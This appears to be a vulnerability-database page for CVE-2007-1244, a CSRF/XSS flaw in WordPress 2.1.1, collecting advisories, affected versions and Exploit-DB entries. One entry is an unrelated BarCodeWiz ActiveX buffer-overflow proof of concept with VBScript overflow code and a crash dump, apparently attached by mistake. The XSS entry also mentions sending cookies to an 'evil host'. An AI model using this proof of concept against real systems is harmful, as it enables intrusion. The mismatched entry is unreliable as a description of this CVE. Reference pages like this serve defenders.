CVE-2007-1244
published 2007-03-03CVE-2007-1244: Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as…
PriorityP430medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
7.32%
93.6th percentile
Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | < wordpress 2.1.2-1 (bookworm) | wordpress 2.1.2-1 (bookworm) |
| wordpress | wordpress | <= 2.1.1 | — |
| wordpress | wordpress | >= 0 < 2.1.2-1 | 2.1.2-1 |
| wordpress | wordpress | >= 0 < 2.1.2-1 | 2.1.2-1 |
| wordpress | wordpress | >= 0 < 2.1.2-1 | 2.1.2-1 |
| wordpress | wordpress | >= 0 < 2.1.2-1 | 2.1.2-1 |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_debian6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pj8j-hmc8-6q85: Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2
ghsa_unreviewed·2022-05-01
CVE-2007-1244 [MEDIUM] GHSA-pj8j-hmc8-6q85: Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2
Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter.
OSV
CVE-2007-1244: Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2
osv·2007-03-03·CVSS 6.8
CVE-2007-1244 [MEDIUM] CVE-2007-1244: Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2
Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter.
Debian
CVE-2007-1244: wordpress - Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2...
vendor_debian·2007·CVSS 6.8
CVE-2007-1244 [MEDIUM] CVE-2007-1244: wordpress - Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2...
Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter.
Scope: local
bookworm: resolved (fixed in 2.1.2-1)
bullseye: resolved (fixed in 2.1.2-1)
forky: resolved (fixed in 2.1.2-1)
sid: resolved (fixed in 2.1.2-1)
trixie: resolved (fixed in 2.1.2-1)
No detection rules found.
Exploit-DB
Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)
exploitdb·2007-05-09
CVE-2007-2585 Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)
Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)
---
2007/05/09
BarCodeWiz ActiveX Control 2.0 (BarcodeWiz.dll) Remote Buffer Overflow Exploit
url: http://www.barcodewiz.com/
price: from $139 to $2,350
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched
Sub tryMe
buff = String(1032,"A")
get_EAX = "aaaa"
buff2 = String(1132,"A")
get_EIP = "bbbb"
egg = buff + get_EAX + buff2 + get_EIP + buff
test.Verify egg
End Sub
faultmon dump:
14:39:21.000 pid=1244 tid=1534 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [61616239])
EAX=61616161: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=03558474: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
E
Exploit-DB
WordPress Core 2.1.1 - 'post.php' Cross-Site Scripting
exploitdb·2007-02-26
CVE-2007-1244 WordPress Core 2.1.1 - 'post.php' Cross-Site Scripting
WordPress Core 2.1.1 - 'post.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/22735/info
Wordpress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Wordpress 2.1.1 is vulnerable to this issue; other versions may also be affected.
Cookie in an Alert Box: Cookie send to an Evil Host:
http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0583.htmlhttp://osvdb.org/33787http://osvdb.org/33788http://secunia.com/advisories/24566http://www.gentoo.org/security/en/glsa/glsa-200703-23.xmlhttp://www.securityfocus.com/archive/1/461351/100/0/threadedhttp://www.securityfocus.com/bid/22735https://exchange.xforce.ibmcloud.com/vulnerabilities/32703http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0583.htmlhttp://osvdb.org/33787http://osvdb.org/33788http://secunia.com/advisories/24566http://www.gentoo.org/security/en/glsa/glsa-200703-23.xmlhttp://www.securityfocus.com/archive/1/461351/100/0/threadedhttp://www.securityfocus.com/bid/22735https://exchange.xforce.ibmcloud.com/vulnerabilities/32703
2007-03-03
Published